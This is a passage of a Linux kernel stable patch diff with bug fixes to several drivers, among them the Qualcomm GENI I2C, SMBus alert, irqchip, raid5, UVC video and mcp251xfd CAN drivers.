+ 	if (ret)
+ 		return ret;
+ 	/*
+@@ -828,36 +845,62 @@ static int geni_i2c_probe(struct platform_device *pdev)
+ 	 */
+ 	gi2c->se.icc_paths[GENI_TO_CORE].avg_bw = GENI_DEFAULT_BW;
+ 	gi2c->se.icc_paths[CPU_TO_GENI].avg_bw = GENI_DEFAULT_BW;
+-	gi2c->se.icc_paths[GENI_TO_DDR].avg_bw = Bps_to_icc(gi2c->clk_freq_out);
++	if (!desc || desc->icc_ddr)
++		gi2c->se.icc_paths[GENI_TO_DDR].avg_bw = Bps_to_icc(gi2c->clk_freq_out);
+ 
+ 	ret = geni_icc_set_bw(&gi2c->se);
+ 	if (ret)
+ 		return ret;
+ 
++	ret = clk_prepare_enable(gi2c->core_clk);
++	if (ret)
++		return ret;
++
+ 	ret = geni_se_resources_on(&gi2c->se);
+ 	if (ret) {
+ 		dev_err(dev, "Error turning on resources %d\n", ret);
++		clk_disable_unprepare(gi2c->core_clk);
+ 		return ret;
+ 	}
+ 	proto = geni_se_read_proto(&gi2c->se);
+ 	if (proto != GENI_SE_I2C) {
+ 		dev_err(dev, "Invalid proto %d\n", proto);
+ 		geni_se_resources_off(&gi2c->se);
++		clk_disable_unprepare(gi2c->core_clk);
+ 		return -ENXIO;
+ 	}
+ 
+-	fifo_disable = readl_relaxed(gi2c->se.base + GENI_IF_DISABLE_RO) & FIFO_IF_DISABLE;
++	if (desc && desc->no_dma_support)
++		fifo_disable = false;
++	else
++		fifo_disable = readl_relaxed(gi2c->se.base + GENI_IF_DISABLE_RO) & FIFO_IF_DISABLE;
++
+ 	if (fifo_disable) {
+ 		/* FIFO is disabled, so we can only use GPI DMA */
+ 		gi2c->gpi_mode = true;
+ 		ret = setup_gpi_dma(gi2c);
+-		if (ret)
++		if (ret) {
++			geni_se_resources_off(&gi2c->se);
++			clk_disable_unprepare(gi2c->core_clk);
+ 			return dev_err_probe(dev, ret, "Failed to setup GPI DMA mode\n");
++		}
+ 
+ 		dev_dbg(dev, "Using GPI DMA mode for I2C\n");
+ 	} else {
+ 		gi2c->gpi_mode = false;
+ 		tx_depth = geni_se_get_tx_fifo_depth(&gi2c->se);
++
++		/* I2C Master Hub Serial Elements doesn't have the HW_PARAM_0 register */
++		if (!tx_depth && desc)
++			tx_depth = desc->tx_fifo_depth;
++
++		if (!tx_depth) {
++			dev_err(dev, "Invalid TX FIFO depth\n");
++			geni_se_resources_off(&gi2c->se);
++			clk_disable_unprepare(gi2c->core_clk);
++			return -EINVAL;
++		}
++
+ 		gi2c->tx_wm = tx_depth - 1;
+ 		geni_se_init(&gi2c->se, gi2c->tx_wm, tx_depth);
+ 		geni_se_config_packing(&gi2c->se, BITS_PER_BYTE,
+@@ -866,6 +909,7 @@ static int geni_i2c_probe(struct platform_device *pdev)
+ 		dev_dbg(dev, "i2c fifo/se-dma mode. fifo depth:%d\n", tx_depth);
+ 	}
+ 
++	clk_disable_unprepare(gi2c->core_clk);
+ 	ret = geni_se_resources_off(&gi2c->se);
+ 	if (ret) {
+ 		dev_err(dev, "Error turning off resources %d\n", ret);
+@@ -931,6 +975,8 @@ static int __maybe_unused geni_i2c_runtime_suspend(struct device *dev)
+ 		gi2c->suspended = 1;
+ 	}
+ 
++	clk_disable_unprepare(gi2c->core_clk);
++
+ 	return geni_icc_disable(&gi2c->se);
+ }
+ 
+@@ -943,10 +989,17 @@ static int __maybe_unused geni_i2c_runtime_resume(struct device *dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = geni_se_resources_on(&gi2c->se);
++	ret = clk_prepare_enable(gi2c->core_clk);
+ 	if (ret)
+ 		return ret;
+ 
++	ret = geni_se_resources_on(&gi2c->se);
++	if (ret) {
++		clk_disable_unprepare(gi2c->core_clk);
++		geni_icc_disable(&gi2c->se);
++		return ret;
++	}
++
+ 	enable_irq(gi2c->irq);
+ 	gi2c->suspended = 0;
+ 	return 0;
+diff --git a/drivers/i2c/i2c-smbus.c b/drivers/i2c/i2c-smbus.c
+index 07c92c8495a3c..8d0b520eb8e8d 100644
+--- a/drivers/i2c/i2c-smbus.c
++++ b/drivers/i2c/i2c-smbus.c
+@@ -34,6 +34,7 @@ static int smbus_do_alert(struct device *dev, void *addrp)
+ 	struct i2c_client *client = i2c_verify_client(dev);
+ 	struct alert_data *data = addrp;
+ 	struct i2c_driver *driver;
++	int ret;
+ 
+ 	if (!client || client->addr != data->addr)
+ 		return 0;
+@@ -47,16 +48,47 @@ static int smbus_do_alert(struct device *dev, void *addrp)
+ 	device_lock(dev);
+ 	if (client->dev.driver) {
+ 		driver = to_i2c_driver(client->dev.driver);
+-		if (driver->alert)
++		if (driver->alert) {
++			/* Stop iterating after we find the device */
+ 			driver->alert(client, data->type, data->data);
+-		else
++			ret = -EBUSY;
++		} else {
+ 			dev_warn(&client->dev, "no driver alert()!\n");
+-	} else
++			ret = -EOPNOTSUPP;
++		}
++	} else {
+ 		dev_dbg(&client->dev, "alert with no driver\n");
++		ret = -ENODEV;
++	}
++	device_unlock(dev);
++
++	return ret;
++}
++
++/* Same as above, but call back all drivers with alert handler */
++
++static int smbus_do_alert_force(struct device *dev, void *addrp)
++{
++	struct i2c_client *client = i2c_verify_client(dev);
++	struct alert_data *data = addrp;
++	struct i2c_driver *driver;
++
++	if (!client || (client->flags & I2C_CLIENT_TEN))
++		return 0;
++
++	/*
++	 * Drivers should either disable alerts, or provide at least
++	 * a minimal handler. Lock so the driver won't change.
++	 */
++	device_lock(dev);
++	if (client->dev.driver) {
++		driver = to_i2c_driver(client->dev.driver);
++		if (driver->alert)
++			driver->alert(client, data->type, data->data);
++	}
+ 	device_unlock(dev);
+ 
+-	/* Stop iterating after we find the device */
+-	return -EBUSY;
++	return 0;
+ }
+ 
+ /*
+@@ -67,6 +99,7 @@ static irqreturn_t smbus_alert(int irq, void *d)
+ {
+ 	struct i2c_smbus_alert *alert = d;
+ 	struct i2c_client *ara;
++	unsigned short prev_addr = I2C_CLIENT_END; /* Not a valid address */
+ 
+ 	ara = alert->ara;
+ 
+@@ -94,8 +127,25 @@ static irqreturn_t smbus_alert(int irq, void *d)
+ 			data.addr, data.data);
+ 
+ 		/* Notify driver for the device which issued the alert */
+-		device_for_each_child(&ara->adapter->dev, &data,
+-				      smbus_do_alert);
++		status = device_for_each_child(&ara->adapter->dev, &data,
++					       smbus_do_alert);
++		/*
++		 * If we read the same address more than once, and the alert
++		 * was not handled by a driver, it won't do any good to repeat
++		 * the loop because it will never terminate. Try again, this
++		 * time calling the alert handlers of all devices connected to
++		 * the bus, and abort the loop afterwards. If this helps, we
++		 * are all set. If it doesn't, there is nothing else we can do,
++		 * so we might as well abort the loop.
++		 * Note: This assumes that a driver with alert handler handles
++		 * the alert properly and clears it if necessary.
++		 */
++		if (data.addr == prev_addr && status != -EBUSY) {
++			device_for_each_child(&ara->adapter->dev, &data,
++					      smbus_do_alert_force);
++			break;
++		}
++		prev_addr = data.addr;
+ 	}
+ 
+ 	return IRQ_HANDLED;
+diff --git a/drivers/irqchip/irq-loongarch-cpu.c b/drivers/irqchip/irq-loongarch-cpu.c
+index fdec3e9cfacfb..9c6f774e49351 100644
+--- a/drivers/irqchip/irq-loongarch-cpu.c
++++ b/drivers/irqchip/irq-loongarch-cpu.c
+@@ -18,11 +18,13 @@ struct fwnode_handle *cpuintc_handle;
+ 
+ static u32 lpic_gsi_to_irq(u32 gsi)
+ {
++	int irq = 0;
++
+ 	/* Only pch irqdomain transferring is required for LoongArch. */
+ 	if (gsi >= GSI_MIN_PCH_IRQ && gsi <= GSI_MAX_PCH_IRQ)
+-		return acpi_register_gsi(NULL, gsi, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_HIGH);
++		irq = acpi_register_gsi(NULL, gsi, ACPI_LEVEL_SENSITIVE, ACPI_ACTIVE_HIGH);
+ 
+-	return 0;
++	return (irq > 0) ? irq : 0;
+ }
+ 
+ static struct fwnode_handle *lpic_get_gsi_domain_id(u32 gsi)
+diff --git a/drivers/irqchip/irq-mbigen.c b/drivers/irqchip/irq-mbigen.c
+index f3faf5c997706..23117a30c6275 100644
+--- a/drivers/irqchip/irq-mbigen.c
++++ b/drivers/irqchip/irq-mbigen.c
+@@ -64,6 +64,20 @@ struct mbigen_device {
+ 	void __iomem		*base;
+ };
+ 
++static inline unsigned int get_mbigen_node_offset(unsigned int nid)
++{
++	unsigned int offset = nid * MBIGEN_NODE_OFFSET;
++
++	/*
++	 * To avoid touched clear register in unexpected way, we need to directly
++	 * skip clear register when access to more than 10 mbigen nodes.
++	 */
++	if (nid >= (REG_MBIGEN_CLEAR_OFFSET / MBIGEN_NODE_OFFSET))
++		offset += MBIGEN_NODE_OFFSET;
++
++	return offset;
++}
++
+ static inline unsigned int get_mbigen_vec_reg(irq_hw_number_t hwirq)
+ {
+ 	unsigned int nid, pin;
+@@ -72,8 +86,7 @@ static inline unsigned int get_mbigen_vec_reg(irq_hw_number_t hwirq)
+ 	nid = hwirq / IRQS_PER_MBIGEN_NODE + 1;
+ 	pin = hwirq % IRQS_PER_MBIGEN_NODE;
+ 
+-	return pin * 4 + nid * MBIGEN_NODE_OFFSET
+-			+ REG_MBIGEN_VEC_OFFSET;
++	return pin * 4 + get_mbigen_node_offset(nid) + REG_MBIGEN_VEC_OFFSET;
+ }
+ 
+ static inline void get_mbigen_type_reg(irq_hw_number_t hwirq,
+@@ -88,8 +101,7 @@ static inline void get_mbigen_type_reg(irq_hw_number_t hwirq,
+ 	*mask = 1 << (irq_ofst % 32);
+ 	ofst = irq_ofst / 32 * 4;
+ 
+-	*addr = ofst + nid * MBIGEN_NODE_OFFSET
+-		+ REG_MBIGEN_TYPE_OFFSET;
++	*addr = ofst + get_mbigen_node_offset(nid) + REG_MBIGEN_TYPE_OFFSET;
+ }
+ 
+ static inline void get_mbigen_clear_reg(irq_hw_number_t hwirq,
+diff --git a/drivers/irqchip/irq-meson-gpio.c b/drivers/irqchip/irq-meson-gpio.c
+index 7da18ef952119..37e4aa091ac82 100644
+--- a/drivers/irqchip/irq-meson-gpio.c
++++ b/drivers/irqchip/irq-meson-gpio.c
+@@ -168,7 +168,7 @@ struct meson_gpio_irq_controller {
+ 	void __iomem *base;
+ 	u32 channel_irqs[MAX_NUM_CHANNEL];
+ 	DECLARE_BITMAP(channel_map, MAX_NUM_CHANNEL);
+-	spinlock_t lock;
++	raw_spinlock_t lock;
+ };
+ 
+ static void meson_gpio_irq_update_bits(struct meson_gpio_irq_controller *ctl,
+@@ -177,14 +177,14 @@ static void meson_gpio_irq_update_bits(struct meson_gpio_irq_controller *ctl,
+ 	unsigned long flags;
+ 	u32 tmp;
+ 
+-	spin_lock_irqsave(&ctl->lock, flags);
++	raw_spin_lock_irqsave(&ctl->lock, flags);
+ 
+ 	tmp = readl_relaxed(ctl->base + reg);
+ 	tmp &= ~mask;
+ 	tmp |= val;
+ 	writel_relaxed(tmp, ctl->base + reg);
+ 
+-	spin_unlock_irqrestore(&ctl->lock, flags);
++	raw_spin_unlock_irqrestore(&ctl->lock, flags);
+ }
+ 
+ static void meson_gpio_irq_init_dummy(struct meson_gpio_irq_controller *ctl)
+@@ -234,12 +234,12 @@ meson_gpio_irq_request_channel(struct meson_gpio_irq_controller *ctl,
+ 	unsigned long flags;
+ 	unsigned int idx;
+ 
+-	spin_lock_irqsave(&ctl->lock, flags);
++	raw_spin_lock_irqsave(&ctl->lock, flags);
+ 
+ 	/* Find a free channel */
+ 	idx = find_first_zero_bit(ctl->channel_map, ctl->params->nr_channels);
+ 	if (idx >= ctl->params->nr_channels) {
+-		spin_unlock_irqrestore(&ctl->lock, flags);
++		raw_spin_unlock_irqrestore(&ctl->lock, flags);
+ 		pr_err("No channel available\n");
+ 		return -ENOSPC;
+ 	}
+@@ -247,7 +247,7 @@ meson_gpio_irq_request_channel(struct meson_gpio_irq_controller *ctl,
+ 	/* Mark the channel as used */
+ 	set_bit(idx, ctl->channel_map);
+ 
+-	spin_unlock_irqrestore(&ctl->lock, flags);
++	raw_spin_unlock_irqrestore(&ctl->lock, flags);
+ 
+ 	/*
+ 	 * Setup the mux of the channel to route the signal of the pad
+@@ -557,7 +557,7 @@ static int meson_gpio_irq_of_init(struct device_node *node, struct device_node *
+ 	if (!ctl)
+ 		return -ENOMEM;
+ 
+-	spin_lock_init(&ctl->lock);
++	raw_spin_lock_init(&ctl->lock);
+ 
+ 	ctl->base = of_iomap(node, 0);
+ 	if (!ctl->base) {
+diff --git a/drivers/irqchip/irq-xilinx-intc.c b/drivers/irqchip/irq-xilinx-intc.c
+index 238d3d3449496..7e08714d507f4 100644
+--- a/drivers/irqchip/irq-xilinx-intc.c
++++ b/drivers/irqchip/irq-xilinx-intc.c
+@@ -189,7 +189,7 @@ static int __init xilinx_intc_of_init(struct device_node *intc,
+ 		irqc->intr_mask = 0;
+ 	}
+ 
+-	if (irqc->intr_mask >> irqc->nr_irq)
++	if ((u64)irqc->intr_mask >> irqc->nr_irq)
+ 		pr_warn("irq-xilinx: mismatch in kind-of-intr param\n");
+ 
+ 	pr_info("irq-xilinx: %pOF: num_irq=%d, edge=0x%x\n",
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 7dc1c42accccd..b87c6ef0da8ab 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -489,7 +489,6 @@ void mddev_suspend(struct mddev *mddev)
+ 	clear_bit_unlock(MD_ALLOW_SB_UPDATE, &mddev->flags);
+ 	wait_event(mddev->sb_wait, !test_bit(MD_UPDATING_SB, &mddev->flags));
+ 
+-	del_timer_sync(&mddev->safemode_timer);
+ 	/* restrict memory reclaim I/O during raid array is suspend */
+ 	mddev->noio_flag = memalloc_noio_save();
+ }
+diff --git a/drivers/md/raid5.c b/drivers/md/raid5.c
+index ed99b449d8fd4..4315dabd32023 100644
+--- a/drivers/md/raid5.c
++++ b/drivers/md/raid5.c
+@@ -6316,7 +6316,9 @@ static sector_t reshape_request(struct mddev *mddev, sector_t sector_nr, int *sk
+ 	safepos = conf->reshape_safe;
+ 	sector_div(safepos, data_disks);
+ 	if (mddev->reshape_backwards) {
+-		BUG_ON(writepos < reshape_sectors);
++		if (WARN_ON(writepos < reshape_sectors))
++			return MaxSector;
++
+ 		writepos -= reshape_sectors;
+ 		readpos += reshape_sectors;
+ 		safepos += reshape_sectors;
+@@ -6334,14 +6336,18 @@ static sector_t reshape_request(struct mddev *mddev, sector_t sector_nr, int *sk
+ 	 * to set 'stripe_addr' which is where we will write to.
+ 	 */
+ 	if (mddev->reshape_backwards) {
+-		BUG_ON(conf->reshape_progress == 0);
++		if (WARN_ON(conf->reshape_progress == 0))
++			return MaxSector;
++
+ 		stripe_addr = writepos;
+-		BUG_ON((mddev->dev_sectors &
+-			~((sector_t)reshape_sectors - 1))
+-		       - reshape_sectors - stripe_addr
+-		       != sector_nr);
++		if (WARN_ON((mddev->dev_sectors &
++		    ~((sector_t)reshape_sectors - 1)) -
++		    reshape_sectors - stripe_addr != sector_nr))
++			return MaxSector;
+ 	} else {
+-		BUG_ON(writepos != sector_nr + reshape_sectors);
++		if (WARN_ON(writepos != sector_nr + reshape_sectors))
++			return MaxSector;
++
+ 		stripe_addr = sector_nr;
+ 	}
+ 
+diff --git a/drivers/media/platform/amphion/vdec.c b/drivers/media/platform/amphion/vdec.c
+index dc35a87e628ec..2bfab4467b81c 100644
+--- a/drivers/media/platform/amphion/vdec.c
++++ b/drivers/media/platform/amphion/vdec.c
+@@ -145,7 +145,6 @@ static int vdec_op_s_ctrl(struct v4l2_ctrl *ctrl)
+ 	struct vdec_t *vdec = inst->priv;
+ 	int ret = 0;
+ 
+-	vpu_inst_lock(inst);
+ 	switch (ctrl->id) {
+ 	case V4L2_CID_MPEG_VIDEO_DEC_DISPLAY_DELAY_ENABLE:
+ 		vdec->params.display_delay_enable = ctrl->val;
+@@ -157,7 +156,6 @@ static int vdec_op_s_ctrl(struct v4l2_ctrl *ctrl)
+ 		ret = -EINVAL;
+ 		break;
+ 	}
+-	vpu_inst_unlock(inst);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/media/platform/amphion/venc.c b/drivers/media/platform/amphion/venc.c
+index 1df2b35c1a240..c9cfef16c5b92 100644
+--- a/drivers/media/platform/amphion/venc.c
++++ b/drivers/media/platform/amphion/venc.c
+@@ -528,7 +528,6 @@ static int venc_op_s_ctrl(struct v4l2_ctrl *ctrl)
+ 	struct venc_t *venc = inst->priv;
+ 	int ret = 0;
+ 
+-	vpu_inst_lock(inst);
+ 	switch (ctrl->id) {
+ 	case V4L2_CID_MPEG_VIDEO_H264_PROFILE:
+ 		venc->params.profile = ctrl->val;
+@@ -589,7 +588,6 @@ static int venc_op_s_ctrl(struct v4l2_ctrl *ctrl)
+ 		ret = -EINVAL;
+ 		break;
+ 	}
+-	vpu_inst_unlock(inst);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/media/tuners/xc2028.c b/drivers/media/tuners/xc2028.c
+index 5a967edceca93..352b8a3679b72 100644
+--- a/drivers/media/tuners/xc2028.c
++++ b/drivers/media/tuners/xc2028.c
+@@ -1361,9 +1361,16 @@ static void load_firmware_cb(const struct firmware *fw,
+ 			     void *context)
+ {
+ 	struct dvb_frontend *fe = context;
+-	struct xc2028_data *priv = fe->tuner_priv;
++	struct xc2028_data *priv;
+ 	int rc;
+ 
++	if (!fe) {
++		pr_warn("xc2028: No frontend in %s\n", __func__);
++		return;
++	}
++
++	priv = fe->tuner_priv;
++
+ 	tuner_dbg("request_firmware_nowait(): %s\n", fw ? "OK" : "error");
+ 	if (!fw) {
+ 		tuner_err("Could not load firmware %s.\n", priv->fname);
+diff --git a/drivers/media/usb/uvc/uvc_video.c b/drivers/media/usb/uvc/uvc_video.c
+index a5ad3ff8bdbb9..aa0a879a9c64a 100644
+--- a/drivers/media/usb/uvc/uvc_video.c
++++ b/drivers/media/usb/uvc/uvc_video.c
+@@ -212,13 +212,13 @@ static void uvc_fixup_video_ctrl(struct uvc_streaming *stream,
+ 		 * Compute a bandwidth estimation by multiplying the frame
+ 		 * size by the number of video frames per second, divide the
+ 		 * result by the number of USB frames (or micro-frames for
+-		 * high-speed devices) per second and add the UVC header size
+-		 * (assumed to be 12 bytes long).
++		 * high- and super-speed devices) per second and add the UVC
++		 * header size (assumed to be 12 bytes long).
+ 		 */
+ 		bandwidth = frame->wWidth * frame->wHeight / 8 * format->bpp;
+ 		bandwidth *= 10000000 / interval + 1;
+ 		bandwidth /= 1000;
+-		if (stream->dev->udev->speed == USB_SPEED_HIGH)
++		if (stream->dev->udev->speed >= USB_SPEED_HIGH)
+ 			bandwidth /= 8;
+ 		bandwidth += 12;
+ 
+@@ -476,6 +476,7 @@ uvc_video_clock_decode(struct uvc_streaming *stream, struct uvc_buffer *buf,
+ 	ktime_t time;
+ 	u16 host_sof;
+ 	u16 dev_sof;
++	u32 dev_stc;
+ 
+ 	switch (data[1] & (UVC_STREAM_PTS | UVC_STREAM_SCR)) {
+ 	case UVC_STREAM_PTS | UVC_STREAM_SCR:
+@@ -522,6 +523,34 @@ uvc_video_clock_decode(struct uvc_streaming *stream, struct uvc_buffer *buf,
+ 	if (dev_sof == stream->clock.last_sof)
+ 		return;
+ 
++	dev_stc = get_unaligned_le32(&data[header_size - 6]);
++
++	/*
++	 * STC (Source Time Clock) is the clock used by the camera. The UVC 1.5
++	 * standard states that it "must be captured when the first video data
++	 * of a video frame is put on the USB bus". This is generally understood
++	 * as requiring devices to clear the payload header's SCR bit before
++	 * the first packet containing video data.
++	 *
++	 * Most vendors follow that interpretation, but some (namely SunplusIT
++	 * on some devices) always set the `UVC_STREAM_SCR` bit, fill the SCR
++	 * field with 0's,and expect that the driver only processes the SCR if
++	 * there is data in the packet.
++	 *
++	 * Ignore all the hardware timestamp information if we haven't received
++	 * any data for this frame yet, the packet contains no data, and both
++	 * STC and SOF are zero. This heuristics should be safe on compliant
++	 * devices. This should be safe with compliant devices, as in the very
++	 * unlikely case where a UVC 1.1 device would send timing information
++	 * only before the first packet containing data, and both STC and SOF
++	 * happen to be zero for a particular frame, we would only miss one
++	 * clock sample from many and the clock recovery algorithm wouldn't
++	 * suffer from this condition.
++	 */
++	if (buf && buf->bytesused == 0 && len == header_size &&
++	    dev_stc == 0 && dev_sof == 0)
++		return;
++
+ 	stream->clock.last_sof = dev_sof;
+ 
+ 	host_sof = usb_get_current_frame_number(stream->dev->udev);
+@@ -560,7 +589,7 @@ uvc_video_clock_decode(struct uvc_streaming *stream, struct uvc_buffer *buf,
+ 	spin_lock_irqsave(&stream->clock.lock, flags);
+ 
+ 	sample = &stream->clock.samples[stream->clock.head];
+-	sample->dev_stc = get_unaligned_le32(&data[header_size - 6]);
++	sample->dev_stc = dev_stc;
+ 	sample->dev_sof = dev_sof;
+ 	sample->host_sof = host_sof;
+ 	sample->host_time = time;
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+index bf3f0f150199d..4d0246a0779a6 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+@@ -475,6 +475,8 @@ int mcp251xfd_ring_alloc(struct mcp251xfd_priv *priv)
+ 		clear_bit(MCP251XFD_FLAGS_FD_MODE, priv->flags);
+ 	}
+ 
++	tx_ring->obj_num_shift_to_u8 = BITS_PER_TYPE(tx_ring->obj_num) -
++		ilog2(tx_ring->obj_num);
+ 	tx_ring->obj_size = tx_obj_size;
+ 
+ 	rem = priv->rx_obj_num;
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+index 237617b0c125f..902eb767426d1 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+@@ -2,7 +2,7 @@
+ //
+ // mcp251xfd - Microchip MCP251xFD Family CAN controller driver
+ //
+-// Copyright (c) 2019, 2020, 2021 Pengutronix,
++// Copyright (c) 2019, 2020, 2021, 2023 Pengutronix,
+ //               Marc Kleine-Budde <kernel@pengutronix.de>
+ //
+ // Based on:
+@@ -16,6 +16,11 @@
+ 
+ #include "mcp251xfd.h"
+ 
++static inline bool mcp251xfd_tx_fifo_sta_full(u32 fifo_sta)
++{
++	return !(fifo_sta & MCP251XFD_REG_FIFOSTA_TFNRFNIF);
++}
++
+ static inline int
+ mcp251xfd_tef_tail_get_from_chip(const struct mcp251xfd_priv *priv,
+ 				 u8 *tef_tail)
+@@ -55,56 +60,39 @@ static int mcp251xfd_check_tef_tail(const struct mcp251xfd_priv *priv)
+ 	return 0;
+ }
+ 
+-static int
+-mcp251xfd_handle_tefif_recover(const struct mcp251xfd_priv *priv, const u32 seq)
+-{
+-	const struct mcp251xfd_tx_ring *tx_ring = priv->tx;
+-	u32 tef_sta;
+-	int err;
+-
+-	err = regmap_read(priv->map_reg, MCP251XFD_REG_TEFSTA, &tef_sta);
+-	if (err)
+-		return err;
+-
+-	if (tef_sta & MCP251XFD_REG_TEFSTA_TEFOVIF) {
+-		netdev_err(priv->ndev,
+-			   "Transmit Event FIFO buffer overflow.\n");
+-		return -ENOBUFS;
+-	}
+-
+-	netdev_info(priv->ndev,
+-		    "Transmit Event FIFO buffer %s. (seq=0x%08x, tef_tail=0x%08x, tef_head=0x%08x, tx_head=0x%08x).\n",
+-		    tef_sta & MCP251XFD_REG_TEFSTA_TEFFIF ?
+-		    "full" : tef_sta & MCP251XFD_REG_TEFSTA_TEFNEIF ?
+-		    "not empty" : "empty",
+-		    seq, priv->tef->tail, priv->tef->head, tx_ring->head);
+-
+-	/* The Sequence Number in the TEF doesn't match our tef_tail. */
+-	return -EAGAIN;
+-}
+-
+ static int
+ mcp251xfd_handle_tefif_one(struct mcp251xfd_priv *priv,
+ 			   const struct mcp251xfd_hw_tef_obj *hw_tef_obj,
+ 			   unsigned int *frame_len_ptr)
+ {
+ 	struct net_device_stats *stats = &priv->ndev->stats;
++	u32 seq, tef_tail_masked, tef_tail;
+ 	struct sk_buff *skb;
+-	u32 seq, seq_masked, tef_tail_masked, tef_tail;
+ 
+-	seq = FIELD_GET(MCP251XFD_OBJ_FLAGS_SEQ_MCP2518FD_MASK,
++	 /* Use the MCP2517FD mask on the MCP2518FD, too. We only
++	  * compare 7 bits, this is enough to detect old TEF objects.
++	  */
++	seq = FIELD_GET(MCP251XFD_OBJ_FLAGS_SEQ_MCP2517FD_MASK,
+ 			hw_tef_obj->flags);
+-
+-	/* Use the MCP2517FD mask on the MCP2518FD, too. We only
+-	 * compare 7 bits, this should be enough to detect
+-	 * net-yet-completed, i.e. old TEF objects.
+-	 */
+-	seq_masked = seq &
+-		field_mask(MCP251XFD_OBJ_FLAGS_SEQ_MCP2517FD_MASK);
+ 	tef_tail_masked = priv->tef->tail &
+ 		field_mask(MCP251XFD_OBJ_FLAGS_SEQ_MCP2517FD_MASK);
+-	if (seq_masked != tef_tail_masked)
+-		return mcp251xfd_handle_tefif_recover(priv, seq);
++
++	/* According to mcp2518fd erratum DS80000789E 6. the FIFOCI
++	 * bits of a FIFOSTA register, here the TX FIFO tail index
++	 * might be corrupted and we might process past the TEF FIFO's
++	 * head into old CAN frames.
++	 *
++	 * Compare the sequence number of the currently processed CAN
++	 * frame with the expected sequence number. Abort with
++	 * -EBADMSG if an old CAN frame is detected.
++	 */
++	if (seq != tef_tail_masked) {
++		netdev_dbg(priv->ndev, "%s: chip=0x%02x ring=0x%02x\n", __func__,
++			   seq, tef_tail_masked);
++		stats->tx_fifo_errors++;
++
++		return -EBADMSG;
++	}
+ 
+ 	tef_tail = mcp251xfd_get_tef_tail(priv);
+ 	skb = priv->can.echo_skb[tef_tail];
+@@ -120,28 +108,44 @@ mcp251xfd_handle_tefif_one(struct mcp251xfd_priv *priv,
+ 	return 0;
+ }
+ 
+-static int mcp251xfd_tef_ring_update(struct mcp251xfd_priv *priv)
++static int
++mcp251xfd_get_tef_len(struct mcp251xfd_priv *priv, u8 *len_p)
+ {
+ 	const struct mcp251xfd_tx_ring *tx_ring = priv->tx;
+-	unsigned int new_head;
+-	u8 chip_tx_tail;
++	const u8 shift = tx_ring->obj_num_shift_to_u8;
++	u8 chip_tx_tail, tail, len;
++	u32 fifo_sta;
+ 	int err;
+ 
+-	err = mcp251xfd_tx_tail_get_from_chip(priv, &chip_tx_tail);
++	err = regmap_read(priv->map_reg, MCP251XFD_REG_FIFOSTA(priv->tx->fifo_nr),
++			  &fifo_sta);
+ 	if (err)
+ 		return err;
+ 
+-	/* chip_tx_tail, is the next TX-Object send by the HW.
+-	 * The new TEF head must be >= the old head, ...
++	if (mcp251xfd_tx_fifo_sta_full(fifo_sta)) {
++		*len_p = tx_ring->obj_num;
++		return 0;
++	}
++
++	chip_tx_tail = FIELD_GET(MCP251XFD_REG_FIFOSTA_FIFOCI_MASK, fifo_sta);
++
++	err =  mcp251xfd_check_tef_tail(priv);
++	if (err)
++		return err;
++	tail = mcp251xfd_get_tef_tail(priv);
++
++	/* First shift to full u8. The subtraction works on signed
++	 * values, that keeps the difference steady around the u8
++	 * overflow. The right shift acts on len, which is an u8.
+ 	 */
+-	new_head = round_down(priv->tef->head, tx_ring->obj_num) + chip_tx_tail;
+-	if (new_head <= priv->tef->head)
+-		new_head += tx_ring->obj_num;
++	BUILD_BUG_ON(sizeof(tx_ring->obj_num) != sizeof(chip_tx_tail));
++	BUILD_BUG_ON(sizeof(tx_ring->obj_num) != sizeof(tail));
++	BUILD_BUG_ON(sizeof(tx_ring->obj_num) != sizeof(len));
+ 
+-	/* ... but it cannot exceed the TX head. */
+-	priv->tef->head = min(new_head, tx_ring->head);
++	len = (chip_tx_tail << shift) - (tail << shift);
++	*len_p = len >> shift;
+ 
+-	return mcp251xfd_check_tef_tail(priv);
++	return 0;
+ }
+ 
+ static inline int
+@@ -182,13 +186,12 @@ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv)
+ 	u8 tef_tail, len, l;
+ 	int err, i;
+ 
+-	err = mcp251xfd_tef_ring_update(priv);
++	err = mcp251xfd_get_tef_len(priv, &len);
+ 	if (err)
+ 		return err;
+ 
+ 	tef_tail = mcp251xfd_get_tef_tail(priv);
+-	len = mcp251xfd_get_tef_len(priv);
+-	l = mcp251xfd_get_tef_linear_len(priv);
++	l = mcp251xfd_get_tef_linear_len(priv, len);
+ 	err = mcp251xfd_tef_obj_read(priv, hw_tef_obj, tef_tail, l);
+ 	if (err)
+ 		return err;
+@@ -203,12 +206,12 @@ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv)
+ 		unsigned int frame_len = 0;
+ 
+ 		err = mcp251xfd_handle_tefif_one(priv, &hw_tef_obj[i], &frame_len);
+-		/* -EAGAIN means the Sequence Number in the TEF
+-		 * doesn't match our tef_tail. This can happen if we
+-		 * read the TEF objects too early. Leave loop let the
+-		 * interrupt handler call us again.
++		/* -EBADMSG means we're affected by mcp2518fd erratum
++		 * DS80000789E 6., i.e. the Sequence Number in the TEF
++		 * doesn't match our tef_tail. Don't process any
++		 * further and mark processed frames as good.
+ 		 */
+-		if (err == -EAGAIN)
++		if (err == -EBADMSG)
+ 			goto out_netif_wake_queue;
+ 		if (err)
+ 			return err;
+@@ -223,6 +226,8 @@ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv)
+ 		struct mcp251xfd_tx_ring *tx_ring = priv->tx;
+ 		int offset;
+ 
++		ring->head += len;
++
+ 		/* Increment the TEF FIFO tail pointer 'len' times in
+ 		 * a single SPI message.
+ 		 *
